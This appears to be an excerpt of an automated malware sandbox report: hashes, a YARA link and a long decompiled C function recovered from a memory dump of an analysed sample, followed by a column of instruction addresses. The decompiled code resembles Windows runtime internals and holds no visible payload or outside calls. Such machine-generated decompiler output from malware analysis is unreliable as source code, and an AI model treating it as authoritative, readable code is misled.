                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 010FFF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                            • API String ID: 0-1911121157
                                                                                                            • Opcode ID: ffc7c55bdf48ccdb4caf20c0169a7bde686f37056cd618b92e9bb22ac30ae94c
                                                                                                            • Instruction ID: 05e5d2dcbcc8591e1671a2acb3849fb822bb756f81ed996346a14bb10aac84bd
                                                                                                            • Opcode Fuzzy Hash: ffc7c55bdf48ccdb4caf20c0169a7bde686f37056cd618b92e9bb22ac30ae94c
                                                                                                            • Instruction Fuzzy Hash: 3E114472910246EFDB66EB54C88AFDCBBF1FF08708F108098F2486B5A1C7389944CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 01135BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 88%
                                                                                                            			E01135BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1141178);
				E010BD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01134C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E010AD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01135542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x11560e8;
								if( *0x11560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x11560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E010A9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E010A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E010AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E010AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E010AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E010AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E010AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E010AF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E010AF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01134CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E010BD130(_t427, _t494, _t511);
				}
			}










































































                                                                                                            0x01135ba5
                                                                                                            0x01135baa
                                                                                                            0x01135baf
                                                                                                            0x01135bb4
                                                                                                            0x01135bb6
                                                                                                            0x01135bbc
                                                                                                            0x01135bbe
                                                                                                            0x01135bc4
                                                                                                            0x01135bcd
                                                                                                            0x01135bd3
                                                                                                            0x01135bd6
                                                                                                            0x01135bdc
                                                                                                            0x01135be0
                                                                                                            0x01135be3
                                                                                                            0x01135beb
                                                                                                            0x01135bf2
                                                                                                            0x01135bf8
                                                                                                            0x01135bfe
                                                                                                            0x01135c04
                                                                                                            0x01135c0e
                                                                                                            0x01135c18
                                                                                                            0x01135c1f
                                                                                                            0x01135c25
                                                                                                            0x01135c2a
                                                                                                            0x01135c2c
                                                                                                            0x01135c32
                                                                                                            0x01135c3a
                                                                                                            0x01135c3f
                                                                                                            0x01135c42
                                                                                                            0x01135c48
                                                                                                            0x01135c5b
                                                                                                            0x01135c5b
                                                                                                            0x01135c2c
                                                                                                            0x01135cb7
                                                                                                            0x01135cb9
                                                                                                            0x01135cbf
                                                                                                            0x01135cc2
                                                                                                            0x01135cca
                                                                                                            0x01135ccb
                                                                                                            0x01135ccb
                                                                                                            0x01135cd1
                                                                                                            0x01135cd7
                                                                                                            0x01135cda
                                                                                                            0x01135ce1
                                                                                                            0x01135ce4
                                                                                                            0x01135ce7
                                                                                                            0x01135ced
                                                                                                            0x01135cf3
                                                                                                            0x01135cf9
                                                                                                            0x01135cff
                                                                                                            0x01135d08
                                                                                                            0x01135d0a
                                                                                                            0x01135d0e
                                                                                                            0x01135d10
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d16
                                                                                                            0x01135d1a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d20
                                                                                                            0x01135d22
                                                                                                            0x01135d25
                                                                                                            0x01135d2f
                                                                                                            0x01135d2f
                                                                                                            0x01135d33
                                                                                                            0x01135d3d
                                                                                                            0x01135d49
                                                                                                            0x01135d4b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d5a
                                                                                                            0x01135d5d
                                                                                                            0x01135d60
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d66
                                                                                                            0x01135d69
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x01135d6f
                                                                                                            0x01135d6f
                                                                                                            0x01135d73
                                                                                                            0x01135d79
                                                                                                            0x01135d7f
                                                                                                            0x01135d86
                                                                                                            0x01135d95
                                                                                                            0x01135d98
                                                                                                            0x01135dba
                                                                                                            0x01135dcb
                                                                                                            0x01135dce
                                                                                                            0x01135dd3
                                                                                                            0x01135dd6
                                                                                                            0x01135dd8
                                                                                                            0x01135de6
                                                                                                            0x01135dec
                                                                                                            0x01135dee
                                                                                                            0x01135df1
                                                                                                            0x01135df3
                                                                                                            0x0113635a
                                                                                                            0x0113635a
                                                                                                            0x00000000
                                                                                                            0x0113635a
                                                                                                            0x01135dfe
                                                                                                            0x01135e02
                                                                                                            0x01135e05
                                                                                                            0x01135e07
                                                                                                            0x01135e10
                                                                                                            0x01135e13
                                                                                                            0x01135e1b
                                                                                                            0x01135e1c
                                                                                                            0x01135e21
                                                                                                            0x01135e22
                                                                                                            0x01135e23
                                                                                                            0x01135e25
                                                                                                            0x01135e2a
                                                                                                            0x01135e2c
                                                                                                            0x01135e2e
                                                                                                            0x01135e36
                                                                                                            0x01135e39
                                                                                                            0x01135e42
                                                                                                            0x01135e47
                                                                                                            0x01135e4d
                                                                                                            0x01135e54
                                                                                                            0x01135e54
                                                                                                            0x01135e54
                                                                                                            0x01135e2e
                                                                                                            0x01135e5c
                                                                                                            0x01135e5f
                                                                                                            0x01135e62
                                                                                                            0x01135e64
                                                                                                            0x01135e6b
                                                                                                            0x01135e70
                                                                                                            0x01135e7a
                                                                                                            0x01135e7a
                                                                                                            0x01135e7a
                                                                                                            0x01135e6b
                                                                                                            0x01135e7e
                                                                                                            0x01135e7f
                                                                                                            0x01135e7f
                                                                                                            0x01135e81
                                                                                                            0x01135e87
                                                                                                            0x01135e8b
                                                                                                            0x01135e8c
                                                                                                            0x01135e8c
                                                                                                            0x01135e8c
                                                                                                            0x01135e9a
                                                                                                            0x01135e9c
                                                                                                            0x01135ea2
                                                                                                            0x01135ea6
                                                                                                            0x01135f50
                                                                                                            0x01135f50
                                                                                                            0x01135f57
                                                                                                            0x01135f66
                                                                                                            0x01135f66
                                                                                                            0x01135f66
                                                                                                            0x01135f68
                                                                                                            0x01135f6a
                                                                                                            0x011363d0
                                                                                                            0x00000000
                                                                                                            0x01135f70
                                                                                                            0x01135f70
                                                                                                            0x01135f91
                                                                                                            0x01135f9c
                                                                                                            0x01135f9e
                                                                                                            0x01135fa4
                                                                                                            0x01135fa6
                                                                                                            0x0113638c
                                                                                                            0x01136392
                                                                                                            0x011363a1
                                                                                                            0x011363a7
                                                                                                            0x011363af
                                                                                                            0x011363af
                                                                                                            0x011363bd
                                                                                                            0x011363d8
                                                                                                            0x00000000
                                                                                                            0x011363d8
                                                                                                            0x01135fac
                                                                                                            0x01135fb2
                                                                                                            0x01135fb4
                                                                                                            0x01135fbd
                                                                                                            0x01135fc6
                                                                                                            0x01135fce
                                                                                                            0x01135fd4
                                                                                                            0x01135fdc
                                                                                                            0x01135fec
                                                                                                            0x01135fed
                                                                                                            0x01135fee
                                                                                                            0x01135fef
                                                                                                            0x01135ff9
                                                                                                            0x01135ffa
                                                                                                            0x01135ffb
                                                                                                            0x01135ffc
                                                                                                            0x01136000
                                                                                                            0x01136004
                                                                                                            0x01136012
                                                                                                            0x01136012
                                                                                                            0x01136018
                                                                                                            0x01136019
                                                                                                            0x0113601a
                                                                                                            0x0113601b
                                                                                                            0x0113601c
                                                                                                            0x01136020
                                                                                                            0x01136059
                                                                                                            0x0113605c
                                                                                                            0x01136061
                                                                                                            0x01136061
                                                                                                            0x01136022
                                                                                                            0x01136022
                                                                                                            0x01136022
                                                                                                            0x01136025
                                                                                                            0x0113602a
                                                                                                            0x0113602b
                                                                                                            0x01136031
                                                                                                            0x01136037
                                                                                                            0x01136038
                                                                                                            0x0113603e
                                                                                                            0x01136048
                                                                                                            0x01136049
                                                                                                            0x0113604a
                                                                                                            0x0113604b
                                                                                                            0x0113604c
                                                                                                            0x0113604d
                                                                                                            0x01136053
                                                                                                            0x01136054
                                                                                                            0x01136054
                                                                                                            0x01136062
                                                                                                            0x01136065
                                                                                                            0x01136067
                                                                                                            0x0113606a
                                                                                                            0x01136070
                                                                                                            0x01136075
                                                                                                            0x01136076
                                                                                                            0x01136081
                                                                                                            0x01136087
                                                                                                            0x01136095
                                                                                                            0x01136099
                                                                                                            0x0113609e
                                                                                                            0x011360a4
                                                                                                            0x011360ae
                                                                                                            0x011360b0
                                                                                                            0x011360b3
                                                                                                            0x011360b6
                                                                                                            0x011360b8
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360ba
                                                                                                            0x011360be
                                                                                                            0x011360c0
                                                                                                            0x011360c5
                                                                                                            0x011360c5
                                                                                                            0x011360c5
                                                                                                            0x011360c6
                                                                                                            0x011360cd
                                                                                                            0x01136114
                                                                                                            0x011360cf
                                                                                                            0x011360cf
                                                                                                            0x011360d4
                                                                                                            0x011360d5
                                                                                                            0x011360da
                                                                                                            0x011360db
                                                                                                            0x011360e1
                                                                                                            0x011360e2
                                                                                                            0x011360e8
                                                                                                            0x011360f8
                                                                                                            0x011360fd
                                                                                                            0x011360fe
                                                                                                            0x01136102
                                                                                                            0x01136104
                                                                                                            0x01136107
                                                                                                            0x01136109
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610b
                                                                                                            0x0113610f
                                                                                                            0x0113610f
                                                                                                            0x01136117
                                                                                                            0x0113611a
                                                                                                            0x0113611f
                                                                                                            0x01136125
                                                                                                            0x01136134
                                                                                                            0x01136139
                                                                                                            0x0113613f
                                                                                                            0x01136146
                                                                                                            0x01136148
                                                                                                            0x0113614b
                                                                                                            0x0113614d
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x0113614f
                                                                                                            0x01136153
                                                                                                            0x01136159
                                                                                                            0x01136159
                                                                                                            0x0113615c
                                                                                                            0x01136163
                                                                                                            0x01136169
                                                                                                            0x0113616c
                                                                                                            0x01136172
                                                                                                            0x01136181
                                                                                                            0x01136186
                                                                                                            0x01136187
                                                                                                            0x0113618b
                                                                                                            0x01136191
                                                                                                            0x01136195
                                                                                                            0x011361a3
                                                                                                            0x011361bb
                                                                                                            0x011361c0
                                                                                                            0x011361c3
                                                                                                            0x011361cc
                                                                                                            0x011361d0
                                                                                                            0x011361dc
                                                                                                            0x011361de
                                                                                                            0x011361e1
